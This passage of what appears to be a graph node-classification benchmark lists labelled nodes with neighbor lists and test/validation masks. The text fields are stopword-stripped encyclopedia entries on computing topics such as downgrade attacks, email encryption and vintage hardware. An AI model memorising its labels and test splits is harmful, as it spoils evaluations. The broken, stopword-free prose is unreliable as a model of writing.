      538,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 11044,
    "label": 4,
    "text": "Downgrade_attack:downgrade attack downgrade attack form cryptographic attack computer system communications protocol makes abandon high-quality mode operation e.g encrypted connection favor older lower-quality mode operation e.g cleartext typically provided backward compatibility older systems example flaw found openssl allowed attacker negotiate use lower version tls client server one common types downgrade attacks another example intercepting web traffic redirecting user secure https version website unencrypted http version downgrade attacks often implemented part man-in-the-middle attack may used way enabling cryptographic attack might possible otherwise downgrade attacks consistent problem ssl/tls family protocols examples attacks include poodle attack downgrade attacks tls protocol take many forms researchers classified downgrade attacks respect four different vectors represents framework reason downgrade attacks follows recent proposals removing backward compatibility often way prevent downgrade attacks however sometimes client server recognize up-to-date manner prevents example web server user agent implement http strict transport security user agent knows server either previously accessed https hsts preload list user agent refuse access site vanilla http even malicious router represents server https-capable",
    "neighbors": [
      9412,
      3657,
      11345,
      1688,
      10908,
      1501,
      2558,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 11045,
    "label": 2,
    "text": "ArchOne:archone archone arch linux based operating system optimized acer aspire one netbooks usable pcs similar hardware archone preconfigured support hardware acer aspire one drivers network sound graphics special keys webcam active make hardware ready use immediately upon first boot archone uses rolling-release model upgrades archone three versions different desktop manager openbox edition gnome edition kde edition. application software including firefox google chrome skype keepassx hsoconnect gparted gimp openoffice.org vlc mplayer",
    "neighbors": [
      5067,
      5363,
      5397,
      5078,
      7483
    ],
    "mask": "Test"
  },
  {
    "node_id": 11046,
    "label": 4,
    "text": "Email_encryption:email encryption email encryption encryption email messages protect content read entities intended recipients email encryption may also include authentication email prone disclosure information emails currently transmitted clear encrypted form emails sent using gmail outlook encrypted default possible send unencrypted email using gmail warning icon appear address bar means available tools persons designated recipients read email contents email encryption rely public-key cryptography users publish public key others use encrypt messages keeping secret private key use decrypt messages digitally encrypt sign messages send original design email protocol communication email servers plain text posed huge security risk years various mechanisms proposed encrypt communication email servers encryption may occur transport level aka hop hop end-to-end transport layer encryption often easier set use end-to-end encryption provides stronger defenses difficult set use one commonly used email encryption extensions starttls tls ssl layer plaintext communication allowing email servers upgrade plaintext communication encrypted communication assuming email servers sender recipient side support encrypted communication eavesdropper snooping communication mail servers use sniffer see email contents similar starttls extensions exist communication email client email server see imap4 pop3 stated rfc 2595 starttls may used regardless whether email contents encrypted using another protocol encrypted message revealed altered intermediate email relays words encryption takes place individual smtp relays sender recipient good bad consequences key positive trait transport layer encryption users need change anything encryption automatically occurs send email addition since receiving organizations decrypt email without cooperation end user receiving organizations run virus scanners spam filters delivering email recipient however also means receiving organization anyone breaks organization email system unless steps taken easily read modify email receiving organization considered threat end-to-end encryption necessary electronic frontier foundation encourages use starttls launched 'starttls everywhere initiative make simple easy everyone help ensure communications email ’ vulnerable mass surveillance support starttls become quite common google reports gmail 90 incoming email 90 outgoing email encrypted using starttls 2018-07-24 mandatory certificate verification historically viable internet mail delivery without additional information many certificates verifiable want email delivery fail case result email delivered tls uses opportunistic encryption dane proposed standard makes incremental transition verified encryption internet mail delivery possible starttls everywhere project uses alternative approach support “ preload list ” email servers promised support starttls help detect prevent downgrade attacks end-to-end encryption data encrypted decrypted end points words email sent end-to-end encryption would encrypted source unreadable service providers like gmail transit decrypted endpoint crucially email would decrypted end user computer would remain encrypted unreadable form email service like gmail would n't keys available decrypt email services integrate end-to-end encryption automatically notable protocols end-to-end email encryption include openpgp data encryption standard allows end-users encrypt email contents various software email-client plugins allow users encrypt message using recipient public key sending core openpgp uses public key cryptography scheme email address associated public/private key pair openpgp provides way end users encrypt email without support server sure intended recipient read however usability issues openpgp — requires users set public/private key pairs make public keys available widely also protects content email metadata — untrusted party still observe sent email general downside end end encryption schemes—where server decryption keys—is makes server side search almost impossible thus impacting usability signed encrypted email internet demonstration shown organizations collaborate effectively using secure email previous barriers adoption overcome including use pki bridge provide scalable public key infrastructure pki use network security guards checking encrypted content passing corporate network boundaries avoid encryption used hide malware introduction information leakage transport layer encryption using starttls must set receiving organization typically straightforward valid certificate must obtained starttls must enabled receiving organization email server prevent downgrade attacks organizations send domain 'starttls policy list' full-featured email clients provide native support s/mime secure email digital signing message encryption using certificates encryption options include pgp gnu privacy guard gnupg free commercial software desktop application webmail add-ons available well pgp protect messages also hard use correct way researchers carnegie mellon university published paper 1999 showing people could n't figure sign encrypt messages using current version pgp eight years later another group carnegie mellon researchers published follow-up paper saying although newer version pgp made easy decrypt messages people still struggled encrypting signing messages finding verifying people public encryption keys sharing keys encryption difficult users security compliance managers companies government agencies automate process employees executives using encryption appliances services automate encryption instead relying voluntary co-operation automated encryption based defined policies takes decision process users hands emails routed gateway appliance configured ensure compliance regulatory security policies emails require automatically encrypted sent recipient works organization uses encryption gateway appliance emails automatically decrypted making process transparent user recipients behind encryption gateway need take extra step either procuring public key logging online portal retrieve message",
    "neighbors": [
      2050,
      3590,
      8202,
      2187,
      8331,
      9744,
      1169,
      1297,
      5016,
      3495,
      8744,
      3629,
      9909,
      5433,
      7117,
      10831,
      3161,
      3930,
      8283,
      4573,
      8674,
      2800,
      3701,
      1529,
      8061
    ],
    "mask": "Test"
  },
  {
    "node_id": 11047,
    "label": 3,
    "text": "AMD_K9:amd k9 amd k9 represents microarchitecture amd designed replace k8 processors featuring dual-core processing k9 appears originally ambitious 8 issue per clock cycle core redesign k7 k8 processor core one point k9 greyhound project amd worked k7 design team beginning early 2001 tape-out revision a0 scheduled 2003 l1 instruction cache said hold decoded instructions essentially intel trace cache existence massively parallel cpu design concept heavily multi threaded applications also revealed planned successor k8 reportedly canceled conceptualization phase 6 months work one time k9 internal codename dual-core amd64 processors brand athlon 64 x2 however amd distanced old k series naming convention seeks talk portfolio products tailored different markets",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      6151,
      8327,
      10375,
      5645,
      7963,
      2719,
      5541,
      2094,
      6978,
      7234,
      11080,
      2764,
      473,
      5356,
      1005,
      9964,
      1137,
      2549,
      3070
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11048,
    "label": 4,
    "text": "Chain_of_trust:chain trust computer security chain trust established validating component hardware software end entity root certificate intended ensure trusted software hardware used still retaining flexibility chain trust designed allow multiple users create use software system would difficult keys stored directly hardware starts hardware boot software digitally signed signing authority sign boot programs enforce security running programs signed allowing signed code access certain features machine process may continue several layers process results chain trust final software trusted certain properties illegally modified signature would invalid previous software would executed previous software trusted turn would loaded signature invalid trustworthiness layer guaranteed one back trust anchor would possible hardware check suitability signature every single piece software however would produce flexibility chain provides chain given link replaced different version provide different properties without go way back trust anchor use multiple layers application general technique improve scalability analogous use multiple certificates certificate chain computer security digital certificates verified using chain trust trust anchor digital certificate root certificate authority ca certificate hierarchy structure certificates allows individuals verify validity certificate issuer certificates issued signed certificates reside higher certificate hierarchy validity trustworthiness given certificate determined corresponding validity certificate signed chain trust certificate chain ordered list certificates containing end-user subscriber certificate intermediate certificates represents intermediate ca enables receiver verify sender intermediate certificates trustworthy process best described page intermediate certificate authority see also x.509 certificate chains description concepts widely used standard digital certificates",
    "neighbors": [
      517,
      510,
      9356,
      9744,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11049,
    "label": 7,
    "text": "Trace-based_simulation:trace-based simulation computer science trace-based simulation refers system simulation performed looking traces program execution system component access purpose performance prediction trace-based simulation may used variety applications analysis solid state disks message passing performance large computer clusters traced-based simulators usually two components one executes actions stores results i.e traces another reads log files traces interpolates new often complex scenarios instance case large computer cluster design execution takes place small number nodes traces left log files simulator reads log files simulates performance much larger number nodes thus providing view performance large applications based execution traces much smaller number nodes",
    "neighbors": [
      11618,
      5029
    ],
    "mask": "None"
  },
  {
    "node_id": 11050,
    "label": 3,
    "text": "Architectural_state:architectural state architectural state part cpu holds state process typically held processor registers includes include actual computation units alu instance",
    "neighbors": [
      8352,
      3630,
      1776,
      4465,
      7313,
      499,
      7858,
      8501,
      10612,
      9911
    ],
    "mask": "Test"
  },
  {
    "node_id": 11051,
    "label": 4,
    "text": "Steve_Gibson_(computer_programmer):steve gibson computer programmer steven steve tiberius gibson born 26 march 1955 american software engineer security researcher security proponent early 1980s gibson worked light pen technology use apple atari systems 1985 founded gibson research corporation best known spinrite software gibson started working computers teenager got first computing job stanford university artificial intelligence lab 15 years old studied electrical engineering computer science university california berkeley gibson hired programmer california pacific computer company 1980 worked copy protection company products gibson founded gibson laboratories laguna hills california 1981 gibson labs developed light pen apple ii atari platforms went business 1983.. 1985 gibson founded gibson research corporation grc computer software development firm 1986 1993 gibson wrote tech talk column infoworld magazine 1999 gibson created one first adware removal programs called optout 2001 gibson predicted microsoft implementation sock_raw protocol initial release windows xp would lead widespread chaos making easier windows xp users create denial service dos attacks year company website brought dos attack attacks continued two weeks gibson blogged attacks ultimately successful efforts track hacker three years windows xp release microsoft limited raw socket support service pack 2 2005 gibson launched weekly podcast called security leo laporte twit.tv archives hosted grc website 2006 gibson raised possibility windows metafile vulnerability bug actually backdoor intentionally engineered system response microsoft mark russinovich microsoft technet stated bug appeared coding error gibson reasoning based upon microsoft abort procedure documentation misleading 2013 proposed sqrl way simplify process authentication without risk revelation information transaction third party grc created number utilities freeware",
    "neighbors": [
      9862,
      107,
      2508,
      1069,
      877,
      10990,
      3445,
      6550,
      8732,
      9085
    ],
    "mask": "Test"
  },
  {
    "node_id": 11052,
    "label": 4,
    "text": "SigSpoof:sigspoof sigspoof family security vulnerabilities affected software package gnu privacy guard gnupg since version 0.2.2 released 1998 several software packages make use gnupg also affected pass enigmail un-patched versions affected software sigspoof attacks allow cryptographic signatures convincingly spoofed certain circumstances potentially enables wide range subsidiary attacks succeed according marcus brinkmann discovered sigspoof vulnerabilities june 2018 existence fact present wild long throws question integrity past emails backups software updates ... source code version control systems like git",
    "neighbors": [
      1024,
      8320,
      2050,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      10003,
      10132,
      4117,
      8726,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      8489,
      9518,
      9904,
      7601,
      1970,
      9395,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      4163,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      4054,
      7639,
      8664,
      857,
      1882,
      4314,
      7515,
      9435,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      9082,
      2558,
      2815
    ],
    "mask": "None"
  },
  {
    "node_id": 11053,
    "label": 3,
    "text": "Jack_the_Nipper:jack nipper jack nipper video game gremlin graphics released 1986 zx spectrum commodore 64 amstrad cpc msx followed sequel character loosely based british comic strip character sweeny toddler jack nipper side-view flip screen game puzzle solving platform elements graphics rendered 2d illusion depth achieved allowing characters move forward back within playing area player controls jack naughty child wants break record naughtiness recorded naughtyometer needs carry various wicked pranks unsuspecting inhabitants town comes contact angry adults spanked spanking nappy rash meter increases grows high jack loses life contact monsters ghosts inhabit town also increase nappy rash game went number 2 uk sales charts behind ghosts n'goblins sinclair user described wallyish style reminiscent pyjamarama running wild village searching houses shops gardens objects use create havoc elsewhere environment populated beano -type characters review noted tempting come across well-tended garden happen bottle weed killer ... tin glue false teeth factory ... zx computing praised graphics spectrum version voted number 40 sinclair readers top 100 games time starting april 1987 sinclair magazine published monthly comic strip based character",
    "neighbors": [
      10931,
      11139,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 11054,
    "label": 3,
    "text": "WDC_65C265:wdc 65c265 western design center wdc w65c265s microcontroller complete fully static 16-bit computer fabricated single chip using hi-rel low power cmos process w65c265s complements established growing line 65xx products wide range microcomputer applications w65c265s developed hi-rel applications minimum power required w65c265s consists w65c816s static central processing unit cpu 8 kb read memory rom 576 bytes random access memory ram processor defined cache software control eight 16-bit timers maskable interrupts high performance interrupt-driven parallel interface bus pib four universal asynchronous receivers transmitters uart baud rate timers monitor watch dog timer restart interrupt twenty-nine priority encoded interrupts built-in emulation features time day tod clock features twin tone generators tgx bus control register bcr external memory bus control interface circuitry peripheral devices abort input low cost virtual memory interface many low power features innovative architecture demonstrated high performance w65c265s cpu well instruction simplicity result system cost-effectiveness wide range computational power",
    "neighbors": [
      7170,
      11395,
      6925,
      10767,
      1170,
      7445,
      664,
      10784,
      4385,
      4773,
      7589,
      9638,
      682,
      2224,
      11314,
      10945,
      3010,
      7235,
      9928,
      6607,
      3157,
      6485,
      9685,
      4569,
      10969,
      5862,
      9964,
      11374,
      10351,
      1776,
      5617,
      7281,
      7282,
      7284,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11055,
    "label": 7,
    "text": "YellowDog:yellowdog yellowdog limited uk software company headquartered bristol yellowdog hybrid multi-cloud management platform intelligent predictive analytics company currently applications two industries 3d rendering media entertainment batch processing financial services company vision creating world people create discover unleashed limited computing power yellowdog founded gareth williams january 2015 incorporated yellowdog limited january 2015 first render application launched sale november 2015 launched second application batch processing financial services march 2018 originally envisioned peer peer power sharing network yellowdog soon changed power source private providers public cloud infrastructure idle capacity handful company data centers uses power give creative firms processing power need produce complex 3d renderings work yellowdog received crowdfunding seedrs 2015 subsequent investment private equity networks vc investment yellowdog gives creative firms processing power need produce complex 3d renderings work standard yellowdog released october 2015 standard yellowdog yellowdog widely used application supports 3ds max maya cinema 4d v-ray corona redshift mental ray software use across visual effects animation cgi naked yellowdog yellowdog deployed first customer october 2016 allows yellowdog support multiple combinations software supported standard yellowdog yellowdog premise released march 2018 finovate europe 2018 support batch processing banks financial services first public presentation product given live finovate europe 2018 yellowdog headquarters located bristol uk engine shed located bristol quarter enterprise zone engine shed new use part old temple meads station brunel original building partnership university bristol hosts business incubators including setsquared supports hi-tech startup companies public consultation engine shed 2 took place november 2016 yellowdog base engine shed encourages innovation collaboration networks based growth plans yellowdog double size 2018",
    "neighbors": [
      8640,
      10116
    ],
    "mask": "Test"
  },
  {
    "node_id": 11056,
    "label": 0,
    "text": "Lexical_Markup_Framework:lexical markup framework language resource management lexical markup framework lmf iso 24613:2008 iso international organization standardization iso/tc37 standard natural language processing nlp machine-readable dictionary mrd lexicons scope standardization principles methods relating language resources contexts multilingual communication goals lmf provide common model creation use lexical resources manage exchange data among resources enable merging large number individual electronic resources form extensive global electronic resources types individual instantiations lmf include monolingual bilingual multilingual lexical resources specifications used small large lexicons simple complex lexicons written spoken lexical representations descriptions range morphology syntax computational semantics computer-assisted translation covered languages restricted european languages cover natural languages range targeted nlp applications restricted lmf able represent lexicons including wordnet edr parole lexicons past lexicon standardization studied developed series projects like genelex edr eagles multext parole simple isle iso/tc37 national delegations decided address standards dedicated nlp lexicon representation work lmf started summer 2003 new work item proposal issued us delegation fall 2003 french delegation issued technical proposition data model dedicated nlp lexicons early 2004 iso/tc37 committee decided form common iso project nicoletta calzolari cnr-ilc italy convenor gil francopoulo tagmatica france monte george ansi usa editors first step developing lmf design overall framework based general features existing lexicons develop consistent terminology describe components lexicons next step actual design comprehensive model best represented lexicons detail large panel 60 experts contributed wide range requirements lmf covered many types nlp lexicons editors lmf worked closely panel experts identify best solutions reach consensus design lmf special attention paid morphology order provide powerful mechanisms handling problems several languages known difficult handle 13 versions written dispatched national nominated experts commented discussed various iso technical meetings five years work including numerous face-to-face meetings e-mail exchanges editors arrived coherent uml model conclusion lmf considered synthesis state art nlp lexicon field iso number 24613 lmf specification published officially international standard 17 november 2008 iso/tc37 standards currently elaborated high level specifications deal word segmentation iso 24614 annotations iso 24611 a.k.a maf iso 24612 a.k.a laf iso 24615 a.k.a synaf iso 24617-1 a.k.a semaf/time feature structures iso 24610 multimedia containers iso 24616 a.k.a mlif lexicons iso 24613 standards based low level specifications dedicated constants namely data categories revision iso 12620 language codes iso 639 scripts codes iso 15924 country codes iso 3166 unicode iso 10646 two level organization forms coherent family standards following common simple rules linguistics constants like /feminine/ /transitive/ defined within lmf recorded data category registry dcr maintained global resource iso/tc37 compliance iso/iec 11179-3:2003 constants used adorn high level structural elements lmf specification complies modeling principles unified modeling language uml defined object management group omg structure specified means uml class diagrams examples presented means uml instance object diagrams xml dtd given annex lmf document lmf composed following components extensions specifically dedicated morphology mrd nlp syntax nlp semantics nlp multilingual notations nlp morphological patterns multiword expression patterns constraint expression patterns following example lexical entry associated lemma clergyman two inflected forms clergyman clergymen language coding set whole lexical resource language value set whole lexicon shown following uml instance diagram elements lexical resource global information lexicon lexical entry lemma word form define structure lexicon specified within lmf document contrary languagecoding language partofspeech commonnoun writtenform grammaticalnumber singular plural data categories taken data category registry marks adorn structure values iso 639-3 clergyman clergymen plain character strings value eng taken list languages defined iso 639-3 additional information like dtdversion feat data expressed following xml fragment example rather simple lmf represent much complex linguistic descriptions xml tagging correspondingly complex first publication lmf specification ratified iso paper became 2015 9th cited paper within language resources evaluation conferences lrec papers semantic representation african languages asian languages european languages semitic languages book published 2013 lmf lexical markup framework entirely dedicated lmf first chapter deals history lexicon models second chapter formal presentation data model third one deals relation data categories iso-dcr 14 chapters deal lexicon system either civil military domain either within scientific research labs industrial applications wordnet-lmf prolmf duelme uby-lmf lg-lmf relish globalatlas global atlas wordscape",
    "neighbors": [
      10752,
      11529,
      8854,
      8087,
      11036,
      5149,
      2206,
      7839,
      416,
      9245,
      5413,
      10413,
      8627,
      2100,
      3126,
      1079,
      5816,
      6977,
      8904,
      1737,
      1610,
      9290,
      8524,
      717,
      2519,
      2904,
      4058,
      2522,
      479,
      4064,
      4322,
      7780,
      8421,
      874,
      8426,
      5614,
      1010,
      3447,
      7164,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 11057,
    "label": 2,
    "text": "Smolt_(Linux):smolt linux smolt computer program used gather hardware information computers running linux submit central server statistical purposes quality assurance support initiated fedora release fedora 7 soon combined effort various linux projects information collection voluntary opt-in anonymous smolt run automatically requested permission uploading new data smolt server october 10 2012 announced smolt would discontinued november 1 2013 effect server http //www.smolts.org responds message smolts project retired smolt widely accepted system assembling linux statistics one place smolt first attempt first accepted major linux distributions collecting kind data across distributions smolt included smolt server stored collected data",
    "neighbors": [
      11135,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 11058,
    "label": 3,
    "text": "DeskStation_Tyne:deskstation tyne deskstation tyne line computer workstations made deskstation technology based mips r4000 r4400 risc microprocessors deskstation tyne designed run windows nt designed conform advanced risc computing standard run associated firmware",
    "neighbors": [
      7234,
      6854,
      6252,
      7215,
      8976,
      2452,
      6942,
      11007
    ],
    "mask": "None"
  },
  {
    "node_id": 11059,
    "label": 3,
    "text": "Burroughs_Medium_Systems:burroughs medium systems burroughs b2500 burroughs b4900 series mainframe computers developed manufactured burroughs corporation pasadena california united states 1966 1991 aimed business world instruction set optimized cobol programming language also known burroughs medium systems contrast burroughs large systems burroughs small systems b2500 b3500 computers announced 1966 operated directly cobol-68 primary decimal data types strings 100 digits one ebcdic ascii digit character two 4-bit binary-coded decimal bcd digits per byte portable cobol programs use binary integers b2500 either even memory addresses memory addressed 4-bit digit big-endian style using 5-digit decimal addresses floating point numbers also used base 10 rather binary base 100 mantissa digits typical cobol statement 'codice_1 may use operands different lengths different digit representations different sign representations statement compiled single 12-byte instruction 3 memory operands complex formatting printing accomplished executing single codice_2 instruction detailed format descriptors high level instructions implemented translate buffer e.g ebcdic ascii conversion table buffer sort table using sort requirements table extreme cases single instructions could run several hundredths second mcp could terminate over-long instructions could interrupt resume partially completed instructions resumption prerequisite page style virtual memory operands cross page boundaries machine matched cobol closely cobol compiler simple fast cobol programmers found easy assembly programming well original instruction set operations memory-to-memory visible data registers arithmetic done serially one digit time beginning most-significant digits working rightwards least-significant digits backwards manual right-to-left methods complicated allowed result writing suppressed overflow cases serial arithmetic worked well cobol languages like fortran bpl much less efficient standard word-oriented computers three reserved memory locations used address indexing 'registers third index register dedicated pointing current procedure stack frame call/return stack reserved memory locations controlled operand sizes size constant b3500 similar b2500 faster cycle time expansion choices b2500 maximum 60 k bytes core memory 2 microsecond cycle time b3500 maximum 500 k bytes 1-microsecond cycle time b2500/3500 weighed b2500/b3500 machines followed b2700/b3700/b4700 1972 b2800/b3800/b4800 1976 b2900/b3900/b4900 1980 first range load microcode floppy disk rather implementing hardware read-only memory finally unisys v series machines v340-v560 1985-90 machines prior b4800 cache memory every operand byte result byte required separate main memory cycle limited program performance compensate b3700/b4700 generation used semiconductor main memory faster expensive power hungry dram used competing machines unusual use decimal numbers memory addresses initially problem merely involved using 1-in-5 rather 1-in-8 decoder logic core memory row selects bank selects later machines used standard memory chips expected binary addresses 1000-byte block logical memory could trivially mapped onto subset 1024 bytes chip 2.3 waste denser chips larger total memories entire decimal address crunched shorter quasi binary form sending address chips done cache memory cycle conversion logic slowed machine cycle somewhat attempted redesign 1975 address space called ms-3 medium systems 3rd generation project cancelled machines b2900 allowed input numbers 'undigit values 9 arithmetic gave unspecified results used form hexadecimal arithmetic within mcp also application programmers later versions discontinued instead supported two new opcodes binary decimal decimal binary support addressing hard drives available burroughs acquisition memorex unisys cancelled v series hardware development 1991 support ended 2004 b4900 later machines integer operations 10 digits less handled parallel longer operands continued use serial method floating point operations limited 17 digits precision later medium systems machines added accumulator register accumulator/memory instructions using 32-bit 7-digit integers 48-bit 80-bit floating point values aligned 16-bit word boundaries operating system called mcp master control program shared many architectural features mcp burroughs large systems stack machines entirely different internally coded assembly language algol-derivative programs separate address spaces dynamically relocated base register otherwise virtual memory paging segmentation larger programs squeezed limited code address space explicit overlays nonresident parts mcp also heavily overlaid initially code data shared single 300,000 digit address space later machines separate million-digit spaces program code process data instructions address fields extended 5 digits 6 digits 4 real index registers added early machines used burroughs head-per-track disk systems rather now-standard movable head platter disks one attempt speed mcp overlays carefully laid likely-next overlays would soon arrive read head current overlay completed similar time-dependent layout optimizations early delay-line drum computers turned impractical maintain software changes better results consistently achieved totally randomized layout mcp overlays operating system system software coded bpl burroughs programming language systems programming language derived algol large system espol systems language initial cobol compiler supported ansi 68 specification supported codice_3 syntax allow inline assembly language coding lacked support relative indexed file support later added ansi 74 version compiler released 1982 mcp allowed programs communicate via core-to-core transmissions codice_4 using storage queues codice_5 implemented system calls using codice_6 instruction exposed languages cobol codice_7 unheard except largest ibm s/360 systems time even major operational headache manage interactions multiple program streams medium systems series effective multi-programming machines even basic versions b2500 could support multiprogramming usable scale larger medium systems processors supported major data center activities banks financial institutions well many businesses government customers medium system preferred platform many data processing professionals medium system computer could simultaneously running batch payroll system inputting bank checks micr reader sorter compiling cobol applications supporting on-line transactions test runs new applications colloquially called 'the mix console command 'codice_8 would shows jobs executing unusual running eight ten programs medium-size b2500 medium system installations often tape clusters four drives integrated mid-height cabinet magnetic tape input output free-standing tape drives also available much expensive tape major storage medium computers early days often used father-son batch updating additional disk becoming cheaper time moved became relegated library/backup device contained data files sometimes program files using mfsolt utility particular application customer/client cobol machine code tape resident disk files job headers card input card print spooling accounting system parameter driven —a blank verse unknown b2500 user",
    "neighbors": [
      512,
      3716,
      1029,
      7173,
      11539,
      11295,
      8352,
      1702,
      8231,
      2477,
      11059,
      8001,
      4424,
      5840,
      2002,
      5714,
      477,
      2533,
      3443,
      7032,
      634
    ],
    "mask": "Test"
  },
  {
    "node_id": 11060,
    "label": 9,
    "text": "Chakra_(JScript_engine):chakra jscript engine chakra jscript engine developed microsoft 32-bit version internet explorer 9 ie9 web browser jscript engine developed closed source proprietary software microsoft developed different javascript engine based jscript newer microsoft edge browser also called chakra chakra javascript engine open-sourced mit license distinctive feature engine jit compiles scripts separate cpu core parallel web browser though microsoft past pointed elements rendering marshalling important browser overall performance improvements engine response evolving competing browsers compared ie8 lagging behind terms client-side script processing speed sunspider tests performed november 18 2009 showed pdc version ie9 executing scripts much faster ie8 slower firefox 3.6 chrome 4 webkit nightly test performed march 15 2010 showed first ie9 platform preview using then-current version chakra faster firefox spidermonkey slower safari squirrelfish extreme chrome v8 opera carakan march 8 2011 microsoft published results showing 32-bit internet explorer 9 faster safari firefox tracemonkey chrome opera march 2011 performance tests zdnet concluded internet explorer 9 32-bit chrome 10 firefox 4 release candidate pretty evenly matched 2012 subsequent versions chakra version included internet explorer 10 introduced additional performance changes including jit compilation x64 arm architectures optimizations related floating point math garbage collection last call jsconf 2015 microsoft announced open sourcing chakracore engine january 2016 github chakracore essentially chakra engine powers microsoft edge browser platform-agnostic bindings i.e without specific interfaces utilised within windows universal app platform january 13 2016 microsoft released chakracore mit license github promised",
    "neighbors": [
      6171,
      3102,
      7713,
      10282,
      8757,
      10808,
      4171,
      9808,
      84,
      8281,
      603,
      10338,
      5219,
      617,
      9328,
      5765,
      6791,
      6797,
      10900,
      8854,
      6827,
      3761,
      5311,
      7871,
      4289,
      10957,
      4822,
      2777,
      7396,
      4326,
      9964,
      10991,
      1776,
      2304,
      259,
      4356,
      11524,
      10507,
      782,
      790,
      4378,
      11549,
      7455,
      7970,
      803,
      1832,
      10026,
      7983,
      3890,
      2880,
      9033,
      11087,
      339,
      11605,
      9560,
      11103,
      5483,
      10097,
      1409,
      3462,
      8584,
      9609,
      6028,
      1935,
      8605,
      8609,
      11683,
      438,
      5054,
      9152,
      9167,
      4051,
      11221,
      5078,
      11223,
      4056,
      482,
      487,
      8681,
      9195,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11061,
    "label": 3,
    "text": "TwinBee:twinbee various twinbee sequels released arcade home console markets following original game spawned audio drama anime adaptations japan twinbee played 2-players simultaneously player takes control cartoon-like anthropomorphic spacecraft player 1 taking control twinbee titular ship player 2 controls winbee game control consists eight-way joystick two buttons one shooting enemies air dropping bombs ground enemies similarly xevious player primary power-ups bells uncovered shooting floating clouds 're hidden player continues shooting bell appears change one four colors regular yellow bells grant bonus points white bell upgrade player gun twin cannon blue bell increases player speed five speed levels green bell allow player create image copies ship additional firepower red bell provide player ship barrier allows sustain damage green red bells combined together power-ups also retrieved ground enemies alternate bell gives player ship three-way gun star eliminates on-screen enemies games genre getting shot single enemy bullet cause player lose life however bullet strikes either side ship instead player ship lose one arms player ship loses arms lose ability throw bombs player must wait ambulance arrive player must navigate ship ambulance repair arms however player ship loses arms second time ambulance arrive two players playing time align ships vertically horizontally together perform powerful attacks twinbee originally appeared arcade game later ported msx family computer famicom version re-released japan famicom mini label game boy advance game officially released first time outside japan part nintendo ds march 2007 name rainbowbell north america although twinbee name restored european release twinbee released japan august 10 2011 regions september 22 2011 nintendo 3ds part 3d classics series release featured amongst games nintendo entertainment system super nes released 3ds tech demo called classic games e3 2010 arcade version twinbee made available microsoft game room service xbox 360 console windows-based pcs december 1 2010 also msx version re-released windows egg project august 19 2014 playstation 4 published hamster corporation japan nes port re-released nintendo switch online november 14 2018 worldwide sp version titled twinbee second helping donburi island released june 12 2019 twinbee version nintendo 3ds received total 68/100 metacritic mixed positive average user score 6.8",
    "neighbors": [
      1763,
      6797,
      9006,
      10931,
      11231
    ],
    "mask": "Test"
  },
  {
    "node_id": 11062,
    "label": 3,
    "text": "ARM_Cortex-A8:arm cortex-a8 arm cortex-a8 32-bit processor core licensed arm holdings implementing armv7-a architecture compared arm11 cortex-a8 dual-issue superscalar design achieving roughly twice instructions per cycle cortex-a8 first cortex design adopted large scale consumer devices key features cortex-a8 core several system-on-chips soc implemented cortex-a8 core including arm cortex force drives mobile devices",
    "neighbors": [
      9732,
      11282,
      9235,
      11289,
      1057,
      38,
      8231,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      630,
      10361,
      638,
      644,
      7300,
      8842,
      146,
      659,
      5267,
      7833,
      666,
      5786,
      10393,
      6815,
      4258,
      4259,
      4773,
      9913,
      4283,
      8383,
      1728,
      10945,
      196,
      5329,
      4821,
      3293,
      2788,
      3300,
      3301,
      9964,
      8433,
      6391,
      3835,
      2814,
      2308,
      781,
      5417,
      2862,
      7988,
      6971,
      1346,
      8003,
      10562,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      6539,
      398,
      1428,
      4508,
      2979,
      5028,
      7077,
      9637,
      9638,
      3511,
      2492,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      3547,
      2524,
      9182,
      10734,
      10223,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 11063,
    "label": 2,
    "text": "The_Core_Pocket_Media_Player:core pocket media player core pocket media player tcpmp software media player operates portable devices windows-based pcs discontinued still available official mirror site supported operating systems include palm os symbian os microsoft windows ce mobile also available microsoft zune hd via hack called liberate tcpmp also hardware accelerated playback ati intel 2700g mobiles tapwave zodiac dell axim x50v/x51v development free version software discontinued corecodec favour commercially licensed coreplayer though tcpmp still regarded one versatile media players pocketpc palm os mobile devices according corecodec.com website september 2002 development team planned continue development releases open source version player offsite code would also incorporated commercial player 2004 corecodec.org open source player released betaplayer 0.01a windows ce windows mobile renamed core pocket media player july 2005 upon release palm os windows ce/mobile operating systems release tcpmp symbian os remarked upon information available forums tcpmp project page indicates development languages used assembly c 2006 corecodec inc. discontinued development tcpmp focus commercial coreplayer platform tcpmp supports many audio video image formats including ac3 he-aac later removed amr divx flac h.263 h.264 jpeg monkey audio mjpeg mpeg-1 mp2 mp3 musepack ms-mpeg4-v3 png speex tiff tta vorbis wav wavpack xvid supports many container formats including 3gp asf avi matroska mpeg ogg ogm quicktime windows desktop platform third-party codec support h.264 third-party plugin support youtube videos flash video formats program received consistently positive reviews performance versatility functionality minor criticism user interface issues hpc factor magazine evaluating version 0.66 declared excellent noting need improvement menu space usage complete lack documentation version 0.70 described best free multimedia player pocket pc palm os platform smartphone pocket pc magazine november 2005 2006 treo central review gave score 4/5 use palm os-equipped treo devices pretty cool logical interface albeit drawbacks supporting almost every video encapsulation known humankind without conversion 